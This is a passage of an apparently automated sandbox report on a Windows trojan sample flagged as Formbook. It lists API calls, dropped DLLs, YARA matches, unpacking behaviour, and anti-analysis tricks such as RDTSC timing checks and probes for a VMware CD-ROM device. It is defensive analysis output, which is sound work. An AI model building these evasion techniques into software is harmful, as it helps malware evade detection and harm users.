          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403486
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_004072721_2_00407272
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_00406A9B1_2_00406A9B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_740D1A981_2_740D1A98
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041B8083_2_0041B808
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041A2AA3_2_0041A2AA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041BBA83_2_0041BBA8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00408C603_2_00408C60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041BD283_2_0041BD28
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00402D8E3_2_00402D8E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041C7853_2_0041C785
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A520A03_2_00A520A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF20A83_2_00AF20A8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3B0903_2_00A3B090
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF28EC3_2_00AF28EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AFE8243_2_00AFE824
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A8303_2_00A4A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A268003_2_00A26800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE10023_2_00AE1002
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A499BF3_2_00A499BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A429903_2_00A42990
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A441203_2_00A44120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A2F9003_2_00A2F900
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF22AE3_2_00AF22AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF32A93_2_00AF32A9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE4AEF3_2_00AE4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEE2C53_2_00AEE2C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ADFA2B3_2_00ADFA2B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B2363_2_00A4B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5EBB03_2_00A5EBB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ACEB8A3_2_00ACEB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5138B3_2_00A5138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4EB9A3_2_00A4EB9A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AD23E33_2_00AD23E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A78BE83_2_00A78BE8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE03DA3_2_00AE03DA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AEDBD23_2_00AEDBD2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A5ABD83_2_00A5ABD8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF2B283_2_00AF2B28
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4A3093_2_00A4A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE231B3_2_00AE231B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A433603_2_00A43360
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00ACCB4F3_2_00ACCB4F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4AB403_2_00A4AB40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE44963_2_00AE4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A424303_2_00A42430
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3841F3_2_00A3841F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AED4663_2_00AED466
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A4B4773_2_00A4B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A565A03_2_00A565A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A525813_2_00A52581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE2D823_2_00AE2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A3D5E03_2_00A3D5E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF25DD3_2_00AF25DD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A20D203_2_00A20D20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF2D073_2_00AF2D07
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A42D503_2_00A42D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF1D553_2_00AF1D55
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AD1EB63_2_00AD1EB6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF2EF73_2_00AF2EF7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A46E303_2_00A46E30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A456003_2_00A45600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AED6163_2_00AED616
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AAAE603_2_00AAAE60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AE67E23_2_00AE67E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AF1FF13_2_00AF1FF1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00AFDFCE3_2_00AFDFCE
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\z9ayiyo.dll 2D78C0015CEC67CD072ACFB337075825D4A6866D5FAC1B497A649DEB2190F42C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: String function: 00AB5720 appears 78 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: String function: 00A2B150 appears 154 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: String function: 00A7D08C appears 43 times
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, 00000001.00000003.208193425.0000000002BC6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, 00000001.00000002.210366962.00000000021A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, 00000003.00000002.213181158.0000000000B1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.2a50000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@3/4@0/0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403486
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404763
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_73784225 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,1_2_73784225
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_0040216B CoCreateInstance,MultiByteToWideChar,1_2_0040216B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeFile created: C:\Users\user\AppData\Local\Temp\nsaBD30.tmpJump to behavior
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeVirustotal: Detection: 38%
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe' Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, 00000001.00000003.206415100.0000000002C40000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, 00000003.00000002.213181158.0000000000B1F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeUnpacked PE file: 3.2.SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_740D1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,1_2_740D1A98
          Source: z9ayiyo.dll.1.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_740D2F60 push eax; ret 1_2_740D2F8E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_004160D8 push ebp; ret 3_2_004160E6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041C96C push cs; ret 3_2_0041C96D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041B3B5 push eax; ret 3_2_0041B408
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041B46C push eax; ret 3_2_0041B472
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041B402 push eax; ret 3_2_0041B408
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041B40B push eax; ret 3_2_0041B472
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041C40D push esi; iretd 3_2_0041C40F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041C485 push FFFFFFC3h; retf 3_2_0041C48D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00415CA3 push edx; retf 3_2_00415CB3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_0041CFC1 pushfd ; retf 3_2_0041CFC8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_004187D8 push ss; ret 3_2_004187DB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_00A7D0D1 push ecx; ret 3_2_00A7D0E4
          Source: initial sampleStatic PE information: section name: .data entropy: 7.7471273442
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeFile created: C:\Users\user\AppData\Local\Temp\nsaBD32.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeFile created: C:\Users\user\AppData\Local\Temp\z9ayiyo.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 3_2_004088B0 rdtsc 3_2_004088B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_00405A15
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_004065C1 FindFirstFileA,FindClose,1_2_004065C1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeCode function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exeProcess queried: DebugPortJump to behavior
